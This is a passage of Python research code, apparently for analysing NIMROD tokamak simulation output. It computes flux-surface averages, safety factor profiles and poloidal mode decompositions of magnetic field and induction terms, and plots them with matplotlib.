ntest=self.fields.eval.eval_field('n',tst,dmode=0,eq=1)\n if ntest ==ntest:\n fst=tst\n else:\n lst=tst\n dist=np.linalg.norm(lst-fst,2)\n print(dist)\n if dist<tol:\n break\n index+=1\n if index>maxit:\n print(\"no convergence\")\n break\n print(fst)\n print(lst)\n return fst\n\n def plot_line(self,line,field,flabel=None,xvar=None,title='Title',\n xlabel='x', ylabel='y',fig_size = [12,6.75],qlist=None):\n print(np.shape(line))\n if 
xvar==None:\n xvar = np.sqrt((line[0, :] - line[0, 0]) ** 2 +\n (line[1, :] - line[1, 0]) ** 2 +\n (line[2, :] - line[2, 0]) ** 2)\n\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(xvar, field, alpha=0.7, label=flabel)\n if qlist is not None:\n for ii in qlist:\n ax.axvline(ii[1],label=ii[0],ls=':')\n ax.legend(loc=1)\n\n ax.set(ylabel=ylabel, xlabel=xlabel,title=title)\n\n\n ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n useOffset=None, useLocale=None, useMathText=True)\n\n plt.tight_layout()\n plt.show()\n return\n\n def analyze_radial(self,dir='mid'):\n npts=500\n lphi=5\n nonlin_order=2\n rzo=np.array([1.76821,-0.0188439,0.0])\n oPoint=self.find_pf_null(self.fields.eval, rzo, flag=0)\n rzx=np.array([1.27,-1.14,0.0])\n xPoint=self.find_pf_null(self.fields.eval, rzx, flag=0)\n #find rmax\n rzmax=np.copy(oPoint)\n rzmax[0]=3.0\n rzmax=self.find_comp_boundary(oPoint,rzmax)\n self.set_2dgrid(oPoint,rzmax,npts,lphi,nonlin_order)\n self.fields.induction()\n divpie_fft=self.fields.fft(self.fields.edict['divpie'])\n divpie0_fft=self.fields.fft(self.fields.edict['divpie0'])\n divpie1_fft=self.fields.fft(self.fields.edict['divpie1'])\n divpieb_fft=self.fields.fft(self.fields.edict['divpieb'])\n\n\n\n pn.PlotNimrod.plot_scalar_line(self.fields.grid.rzp[:,:,0], self.fields.fielddict['fsa_beq2'].data[:,0])\n\n\n q=np.empty(npts)\n q[:]=np.NaN\n length=np.sqrt(\n (self.fields.grid.rzp[0,:,0] - self.fields.grid.rzp[0,0,0]) ** 2 +\n (self.fields.grid.rzp[1,:,0] - self.fields.grid.rzp[1,0,0]) ** 2 +\n (self.fields.grid.rzp[2,:,0] - self.fields.grid.rzp[2,0,0]) ** 2)\n for ii in range(npts):\n yvar, contours = fsa.FSA(self.fields.eval, self.fields.grid.rzp[:,ii,0], self.q_fsa, neq=1, \\\n nsurf=1,flag=1,normalize=False,rzp=self.fields.grid.rzp[:,ii,0])\n if yvar!=yvar:\n break\n q[ii]=yvar/(np.pi*2.0)\n\n iend=npts-1\n while np.isnan(q[iend]):\n iend -= 1\n lenofq=interp1d(q[:iend], length[:iend], kind='cubic',fill_value=\"extrapolate\")\n qlist=[]\n qlist.append(('q=-2',lenofq(-2)))\n qlist.append(('q=-3',lenofq(-3)))\n qlist.append(('q=-4',lenofq(-4)))\n\n self.plot_line(self.fields.grid.rzp[:,:,0], np.abs(divpie_fft[0,:,1]),\n title=\"Radial n=1 neoclassical E\",xlabel=\"Distance from o-point\", ylabel=r\"$|E_\\Pi|_R$\",\n qlist=qlist)\n\n self.plot_line(self.fields.grid.rzp[:,:,0], np.abs(divpie_fft[1,:,1]),\n title=\"Radial n=1 neoclassical E\",xlabel=\"Distance from o-point\", ylabel=r\"$|E_\\Pi|_Z$\",\n qlist=qlist)\n\n self.plot_line(self.fields.grid.rzp[:,:,0], np.abs(divpie0_fft[1,:,0]),\n title=\"Vertical n=1 E factor\",xlabel=\"Distance from o-point\", ylabel=r\"$|F_E|_Z$\",\n qlist=qlist)\n\n self.plot_line(self.fields.grid.rzp[:,:,0], np.abs(divpie1_fft[1,:,0]),\n title=\"Vertical n=1 neoclassical stress\",xlabel=\"Distance from o-point [m]\", ylabel=r\"$ |\\Pi_e|_Z$\",\n qlist=qlist)\n\n self.plot_line(self.fields.grid.rzp[:,:,0], np.abs(divpieb_fft[1,:,0]),\n title=\"Vertical n=1 neoclassical factor\",xlabel=\"Distance from o-point\", ylabel=r\"$|Fl_\\Pi|_Z$\",\n qlist=qlist)\n\n @staticmethod\n def calc_nmodes(lphi):\n nmodes=int(2**lphi/3)+1\n return nmodes\n\n def get_m_index(self,m):\n '''Return the index for the given m\n Return None if m is out of range'''\n if self.mmax==None:\n write(\"mmax has not be set in get_m_index\")\n raise\n else:\n if m>self.mmax:\n return None\n elif m<-1*self.mmax:\n return None\n else:\n return m+self.mmax\n\n def dummy_fsa(self,rzc,y,dy,evalnimrod,fargs):\n '''\n Dummy integrand for complex fsa, this is used to get v' 
and q\n without running a true fsa\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n '''\n dy[4]=1.0\n return dy\n\n def q_fsa(self,rzc,y,dy,evalnimrod,fargs):\n '''\n Simple integrand for this is used to get q when running with 1 rzp\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n '''\n dy[4]=dy[3]\n return dy\n\n def surfmn_int(self,rzc,y,dy,evalnimrod,fargs):\n '''\n Integrand for fluxsurface integration\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth\n dy(3)=dq\n dy(4)=dtheta\n '''\n addpert=fdict.get(\"addpert\",True)\n #self.mmax=fargs.get(\"mmax\")\n b0=np.array(fsa.get_b0(evalnimrod,rzc,addpert))\n b = evalnimrod.eval_field('b', rzc, dmode=0)\n rr =rzc[0]\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4]=dy[2]/jac #dtheta\n for ii, im in enumerate(self.ifour):\n oset = ii * (4*self.mmax+1)\n reb=np.real(b[:,im+1])\n imb=np.imag(b[:,im+1])\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(self.mmax):\n nmth=-(self.mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[6+self.mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[6+2*self.mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[6+3*self.mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[5+self.mmax+oset]=rBePsi*dy[2]\n return dy\n\n @timer.timer_func\n def induction_int(self,rzc,y,dy,evalnimrod,fargs):\n ifour=fargs.get(\"ifour\")\n mmax=fargs['mmax']\n nfour=len(fargs['ifour'])\n addpert=fargs.get(\"addpert\",True)\n lphi=5\n nonlin_order=2\n grid=self.set_fsagrid(rzc[0],rzc[1],lphi,nonlin_order)\n self.fields.fielddict={}\n self.fields.ndict={}\n self.fields.edict={}\n self.fields.eval_b(grid=grid,fft=True)\n self.fields.induction(grid=grid)\n if addpert:\n b0=self.fields.fielddict['b0'].data[:,0]\n else:\n b0=self.fields.fielddict['beq'].data[:,0]\n rr =rzc[0]\n #print(fargs.get('psi'))\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4]=dy[2]/jac\n nfour=ifour[0]\n #get br first\n ii=0\n # for ii, im in enumerate(ifour):\n oset = ii * (4*mmax+1)\n #todo test\n# reb=np.real(self.fields.fielddict['bpert'].data[:,nfour])\n# imb=np.imag(self.fields.fielddict['bpert'].data[:,nfour])\n reb=np.real(self.fields.fielddict['bfour'][:,nfour])\n imb=np.imag(self.fields.fielddict['bfour'][:,nfour])\n\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(mmax):\n nmth=-(mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[6+mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[6+2*mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[6+3*mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[5+mmax+oset]=rBePsi*dy[2]\n #print(self.fields.dbdtdict.keys())\n for ii, ikey in enumerate(self.fields.dbdtdict):\n oset = (ii+1) * (4*mmax+1)\n thisFi=self.fields.fft(self.fields.dbdtdict[ikey])[:,nfour]\n reFi=np.real(thisFi)\n imFi=np.imag(thisFi)\n # print(ikey,reFi,imFi)\n rFiPsi=rr*(reFi[1]*b0[0]-reFi[0]*b0[1])\n iFiPsi=rr*(imFi[1]*b0[0]-imFi[0]*b0[1])\n # print(rFiPsi,iFiPsi)\n for im in 
range(mmax):\n nmth=-(mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rFiPsi*np.cos(nmth)-iFiPsi*np.sin(nmth))*dy[2]\n dy[6+mmax+im+oset]=(rFiPsi*np.cos(pmth)-iFiPsi*np.sin(pmth))*dy[2]\n dy[6+2*mmax+im+oset]=-(rFiPsi*np.sin(nmth)+iFiPsi*np.cos(nmth))*dy[2]\n dy[6+3*mmax+im+oset]=-(rFiPsi*np.sin(pmth)+iFiPsi*np.cos(pmth))*dy[2]\n dy[5+mmax+oset]=rFiPsi*dy[2]\n return dy\n\n @timer.timer_func\n def psi_int(self,rzc,y,dy,evalnimrod,fargs):\n ifour=fargs.get(\"ifour\")\n mmax=fargs['mmax']\n nfour=len(fargs['ifour'])\n addpert=fargs.get(\"addpert\",True)\n lphi=5\n nonlin_order=2\n grid=self.set_fsagrid(rzc[0],rzc[1],lphi,nonlin_order)\n self.fields.fielddict={}\n self.fields.ndict={}\n self.fields.edict={}\n self.fields.eval_b(grid=grid,fft=True)\n if addpert:\n b0=self.fields.fielddict['b0'].data[:,0]\n else:\n b0=self.fields.fielddict['beq'].data[:,0]\n rr =rzc[0]\n #print(fargs.get('psi'))\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4]=dy[2]/jac\n nfour=ifour[0]\n\n ii=0\n # for ii, im in enumerate(ifour):\n oset = ii * (4*mmax+1)\n #print(self.fields.fielddict['bfour'])\n #print(self.fields.fielddict['bfour'].shape)\n reb=np.real(self.fields.fielddict['bfour'][:,nfour])\n #print(self.fields.fielddict['bfour'].data[:,:])\n imb=np.imag(self.fields.fielddict['bfour'][:,nfour])\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(mmax):\n nmth=-(mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[6+mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[6+2*mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[6+3*mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[5+mmax+oset]=rBePsi*dy[2]\n return dy\n\n def get_rho_q(self,q):\n try:\n return interp1d(self.q,self.rhon, kind='cubic',fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_field_rho(self,field,rhon):\n try:\n return interp1d(self.rhon,field, kind='cubic')(rhon)\n except:\n print(f\"Problem evaluitng field at rhon={rhon}\")\n raise\n\n @timer.timer_func\n def calculate_induction(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n self.fields.set_method(\"induction\")\n ifour=fargs.get(\"ifour\")\n mmax=fargs['mmax']\n nfour=len(fargs['ifour'])\n self.mmax=mmax\n self.ifour=ifour\n self.nfour=nfour\n self.fsa=True\n fargs['rtol']=1.e-8\n #\n dvar, yvar, contours = fsa.FSA(self.fields.eval, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic',fill_value=\"extrapolate\")\n #call induction at opoint to get number of fields\n self.fields.induction(grid=rzo)\n nterms=len(self.fields.dbdtdict)+1\n #neq 1 for dtheta\n #4*self.mmax+1 for each field per toroidal mode\n #to keep things simple let's assume 1 toroidal mode\n #include 1 term for B itself\n neq =1+nterms*1*(4*mmax+1)\n dvar,yvar,contours = fsa.FSA(self.fields.eval, rzo, self.induction_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n **fargs)\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = 
np.linspace(rhomin,rhomax,200,endpoint=True)\n\n bmn_amp=np.zeros([1,2*mmax+1,iend])\n bmn_phase=np.zeros([1,2*mmax+1,iend])\n bcmn=np.zeros([1,2*mmax+1,iend])\n bsmn=np.zeros([1,2*mmax+1,iend])\n\n ii=0\n oset = ii * (4*mmax+1)\n bcmn[ii,:,:]= yvar[1+oset:2*mmax+2+oset,:iend]*(np.pi*2.0)\n bsmn[ii,0:mmax,:]=\\\n yvar[2+2*mmax+oset:2+3*mmax+oset,:iend]*(np.pi*2.0)\n bsmn[ii,mmax+1:2*mmax+1,:]=\\\n yvar[2+3*mmax+oset:2+4*mmax+oset,:iend]*(np.pi*2.0)\n bmn_amp=np.sqrt(np.square(bcmn)+np.square(bsmn))\n bmn_phase=np.arctan2(bsmn,bcmn)\n this_dict={}\n self.fsa_dict={}\n for ii, ikey in enumerate(self.fields.dbdtdict):\n oset = (ii+1) * (4*mmax+1)\n #oset = (ii+1)\n this_amp=np.zeros([1,2*mmax+1,iend])\n this_phase=np.zeros([1,2*mmax+1,iend])\n this_cmn=np.zeros([1,2*mmax+1,iend])\n this_smn=np.zeros([1,2*mmax+1,iend])\n this_cmn[0,:,:]= yvar[1+oset:2*mmax+2+oset,:iend]*(np.pi*2.0)\n this_smn[0,0:mmax,:]=\\\n yvar[2+2*mmax+oset:2+3*mmax+oset,:iend]*(np.pi*2.0)\n this_smn[0,mmax+1:2*mmax+1,:]=\\\n yvar[2+3*mmax+oset:2+4*mmax+oset,:iend]*(np.pi*2.0)\n print(ikey)\n self.fsa_dict[ikey]=(this_cmn,this_smn)\n\n #dvars\n self.dvar_dict={}\n self.dvar_dict['psin']=dvar[0,:iend]\n self.dvar_dict['rhon']=dvar[1,:iend]\n self.dvar_dict['psi']=dvar[2,:iend]\n self.dvar_dict['vprime']=dvar[6,:iend]\n self.dvar_dict['q']=dvar[7,:iend]\n\n self.raw_bcmn=bcmn\n self.raw_bsmn=bsmn\n self.raw_bmn_amp=bmn_amp\n self.raw_bmn_phase =bmn_phase\n\n self.interpolate_fsa()\n\n # neq=1+nterm*self.nfour*(4*self.mmax+1)\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(self.rhon,self.q)\n plt.show()\n\n fig =plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(self.rhon,self.bmn_amp[0,2,:])\n plt.show()\n\n fig =plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(self.rhon,self.bmn_phase[0,2,:])\n plt.show()\n\n return None\n\n\n @timer.timer_func\n def calculate_psi(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n self.fields.set_method(\"induction\")\n\n ifour=fargs.get(\"ifour\")\n mmax=fargs['mmax']\n nfour=len(fargs['ifour'])\n self.mmax=mmax\n self.ifour=ifour\n self.nfour=nfour\n\n self.fsa=True\n fargs['rtol']=1.e-8\n #\n dvar, yvar, contours = fsa.FSA(self.fields.eval, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic',fill_value=\"extrapolate\")\n #call induction at opoint to get number of fields\n self.fields.induction(grid=rzo)\n nterms=len(self.fields.dbdtdict)+1\n #neq 1 for dtheta\n #4*self.mmax+1 for each field per toroidal mode\n #to keep things simple let's assume 1 toroidal mode\n #include 1 term for B itself\n neq =1+(4*mmax+1)\n # neq=1+(4*mmax+1)\n dvar,yvar,contours = fsa.FSA(self.fields.eval, rzo, self.psi_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n **fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n\n bmn_amp=np.zeros([1,2*mmax+1,iend])\n bmn_phase=np.zeros([1,2*mmax+1,iend])\n bcmn=np.zeros([1,2*mmax+1,iend])\n bsmn=np.zeros([1,2*mmax+1,iend])\n\n ii=0\n oset = ii * (4*mmax+1)\n bcmn[ii,:,:]= yvar[1+oset:2*mmax+2+oset,:iend]*(np.pi*2.0)\n bsmn[ii,0:mmax,:]=\\\n 
yvar[2+2*mmax+oset:2+3*mmax+oset,:iend]*(np.pi*2.0)\n bsmn[ii,mmax+1:2*mmax+1,:]=\\\n yvar[2+3*mmax+oset:2+4*mmax+oset,:iend]*(np.pi*2.0)\n bmn_amp=np.sqrt(np.power(bcmn,2)+np.power(bsmn,2))\n bmn_phase=np.arctan2(bsmn,bcmn)\n\n #dvars\n self.dvar_dict={}\n self.dvar_dict['psin']=dvar[0,:iend]\n self.dvar_dict['rhon']=dvar[1,:iend]\n self.dvar_dict['psi']=dvar[2,:iend]\n self.dvar_dict['vprime']=dvar[6,:iend]\n self.dvar_dict['q']=dvar[7,:iend]\n\n self.raw_bcmn=bcmn\n self.raw_bsmn=bsmn\n self.raw_bmn_amp=bmn_amp\n self.raw_bmn_phase =bmn_phase\n\n self.interpolate_psi()\n\n # neq=1+nterm*self.nfour*(4*self.mmax+1)\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(self.rhon,self.q)\n plt.show()\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(dvar[1,:iend],bmn_amp[0,3,:])\n plt.show()\n\n fig =plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n for im in range(self.bmn_amp.shape[1]):\n conf=plt.plot(self.rhon,self.bmn_amp[0,im,:],label=f\"index={im}\")\n plt.legend()\n plt.show()\n\n fig =plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n for im in range(self.bmn_amp.shape[1]):\n conf=plt.plot(self.rhon,self.bcmn[0,im,:],label=f\"cos index={im}\")\n plt.legend()\n plt.show()\n\n fig =plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(self.rhon,self.bmn_amp[0,3,:],label=f\"index={3}\")\n conf=plt.plot(self.rhon,self.bmn_amp[0,7,:],label=f\"index={7}\")\n plt.legend()\n plt.show()\n\n\n return None\n\n def calculate(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n mi=kwargs.get(\"mi\",3.3435860e-27)\n qe=kwargs.get(\"qe\",1.609e-19)\n self.ifour=fargs.get(\"ifour\")\n self.mmax=fargs['mmax']\n self.nfour=len(fargs['ifour'])\n self.setprofiles=True\n\n #first call to fsa is to calcualte q\n evalnimrod=eval.EvalNimrod(self.dumpfile,fieldlist='nvptbj')\n dvar, yvar, contours = fsa.FSA(evalnimrod, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic')\n\n #second call to fsa is to calcualte b_ms ans psi_mn\n neq=1+self.nfour*(4*self.mmax+1)\n dvar,yvar,contours = fsa.FSA(evalnimrod, rzo, self.surfmn_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n bmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bcmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bsmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n for ii in range(self.nfour):\n oset = ii * (4*self.mmax+1)\n bcmn[ii,:,:]= yvar[1+oset:2*self.mmax+2+oset,:iend]*(np.pi*2.0)\n bsmn[ii,0:self.mmax,:]=\\\n yvar[2+2*self.mmax+oset:2+3*self.mmax+oset,:iend]*(np.pi*2.0)\n bsmn[ii,self.mmax+1:2*self.mmax+1,:]=\\\n yvar[2+3*self.mmax+oset:2+4*self.mmax+oset,:iend]*(np.pi*2.0)\n bmn=np.sqrt(np.square(bcmn)+np.square(bsmn))\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n #dvars\n self.psin=interp1d(dvar[1,:iend], dvar[0,:iend], kind='cubic')(self.rhon)\n self.psi=interp1d(dvar[1,:iend], dvar[2,:iend], kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(dvar[1,:iend], dvar[6,:iend], kind='cubic')(self.rhon)\n self.q=interp1d(dvar[1,:iend], dvar[7,:iend], kind='cubic')(self.rhon)\n\n 
self.bcmn=interp1d(dvar[1,:iend],bcmn, kind='cubic')(self.rhon)\n self.bsmn=interp1d(dvar[1,:iend],bsmn, kind='cubic')(self.rhon)\n self.bmn =interp1d(dvar[1,:iend],bmn , kind='cubic')(self.rhon)\n\n def get_b0(self,eval_nimrod,rzn,flag,abort=False):\n \"\"\"\n Find b at a given point\n :param eval_nimrod: eval_nimrod class instance\n :param rzn: initial guess for poloidal field null\n :param flag: if 0 only use eq, if 1 add n=0 to eq\n :param abort: raise an exception if true and can't find b\n \"\"\"\n b = eval_nimrod.eval_field('b', rzn, dmode=0)\n b0=np.real(b[:])\n if (abort and np.isnan(b0).any()):\n print(b)\n raise Exception('FSA_find_pf_null: Hit wall')\n return b0\n\n def find_pf_null(self,eval_nimrod, rzn, flag=0):\n \"\"\"\n Find a poloidal field null\n :param eval_nimrod: eval_nimrod class instance\n :param rzn: initial guess for poloidal field null\n :param flag: if 0 only use eq, if 1 add n=0 to eq\n \"\"\"\n rzn = np.array(rzn)\n maxsteps=1000\n it=0\n rtol=1.e-8\n drz0=0.125*rzn[0]\n while True:\n b = self.get_b0(eval_nimrod,rzn,flag,abort=False)\n norm0=np.sqrt(b[0]**2+b[1]**2)\n rvn=-rzn[0]*b[1]/norm0\n zvn= rzn[0]*b[0]/norm0\n drz=drz0*(1.0-float(it)/maxsteps)+rtol*rzn[0]\n while True:\n rr=rzn[0]+rvn*drz\n zz=rzn[1]+zvn*drz\n rzng=np.array([rr, zz, 0.0])\n b = self.get_b0(eval_nimrod,rzng,flag,abort=False)\n if not np.isnan(b).any():\n norm=np.sqrt(b[0]**2+b[1]**2)\n if (norm < norm0):\n rzn[:]=rzng[:]\n break\n rr=rzn[0]-rvn*drz\n zz=rzn[1]-zvn*drz\n rzng=np.array([rr, zz, 0.0])\n b = self.get_b0(eval_nimrod,rzng,flag,abort=False)\n if not np.isnan(b).any():\n norm=np.sqrt(b[0]**2+b[1]**2)\n if (norm < norm0):\n rzn[:]=rzng[:]\n break\n drz=drz/2.0\n if (drz/rzn[0] < rtol):\n return rzn # done\n it=it+1\n if it>=maxsteps:\n raise Exception('FSA find_pf_null: No convergence')\n return None\n\n def plot(self,pargs={}):\n for im,imode in enumerate(self.ifour):\n self.plot_radial(im,imode,pargs)\n self.plot_surfmn(im,imode,pargs)\n\n def plot_radial(self,ii,imode,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi_m$ [mWb]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=18\n if imode==1:\n mlist=range(-4,1)\n elif imode==2:\n mlist=range(-6,-1)\n else:\n mstart=-2*imode\n mlist=range(mstart,mstart+imode+1)\n if 'mlists' in pargs:\n if ii<len(pargs['mlists'][ii]):\n mlist=pargs['mlists'][ii]\n\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im%len(colorlist)]\n ax.plot(self.rhon,self.bmn[ii,this_i,:]*1000, color=tc, label=mlbl)\n try:\n qlist=pargs['qlists'][ii]\n except:\n if imode==1:\n qlist=[-4,-3,-2]\n elif imode==2:\n qlist=[-4,-3,-2.5,-2,-1.5]\n elif imode==3:\n qlist=[-3,-2.33, -2,-1.67,-1.33]\n elif imode==4:\n qlist=[-3,-2,-1.75,-1.5,-1.25]\n elif imode==5:\n qlist=[-3,-2,-1.8,-1.6,-1.4,-1.2]\n else:\n qlist=[-4,-3,-2]\n\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,frameon=True,fontsize=fontsize)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n def plot_surfmn(self,im,imode,surfmn,pargs={}):\n fig = 
plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Set titles and labels\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=np.amax(self.bmn[im,:,:])*1000\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(self.q)\n qmax=np.amax(self.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-self.mmax,self.mmax+1)\n mv, rv = np.meshgrid(m, self.rhon, sparse=False, indexing='ij')\n conf=plt.contourf(mv,rv,np.clip(self.bmn[im,:,:]*1000,0,None),levels=levels,vmax=vmax)\n plt.plot(imode*mrange,self.get_rho_q(mrange),c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\rho_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-self.mmax,self.mmax)\n plt.show()\n\n def get_dumptime(self):\n ''' Open the hdf5 dumpfile read the dump time and dumpstep\n '''\n with h5py.File(self.dumpfile, 'r') as h5file:\n try:\n self.time=h5file[\"dumpTime\"].attrs['vsTime']\n self.step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self.dumpfile}\")\n raise\n\n def plot_scalar(self,rr,zz,field):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.set_cmap('nipy_spectral')\n conf=plt.contourf(rr,zz,field,corner_mask=False)\n plt.show()\n\n @staticmethod\n def phase_shift(array,shift):\n array=array-shift\n array=np.where(array<-np.pi,array+np.pi,array)\n array=np.where(array>np.pi,array-np.pi,array)\n return array\n\n @staticmethod\n def phase_shift2(fcos,fsin,phase):\n ncosphase=np.cos(-phase)\n nsinphase=np.sin(-phase)\n inphase=fcos*ncosphase-fsin*nsinphase\n outphase=fcos*nsinphase+fsin*ncosphase\n return inphase,outphase\n\n def plot_fsa(self, key=None, **kwargs):\n qlist=[-2,-3,-4]\n fontsize=18\n colorlist = list(mcolors.TABLEAU_COLORS)\n titledict={}\n titledict['veqbeq']=r\"$\\nabla \\times \\left(V_0 \\times B_0\\right)_{2/1}$\"\n titledict['vpbeq']=r\"$\\nabla \\times \\left(\\tilde V \\times B_0\\right)_{2/1}$\"\n titledict['veqbp']=r\"$\\nabla \\times \\left(V_0 \\times \\tilde B\\right)_{2/1}$\"\n titledict['vpbp']=r\"$\\nabla \\times \\left(\\tilde V \\times \\tilde 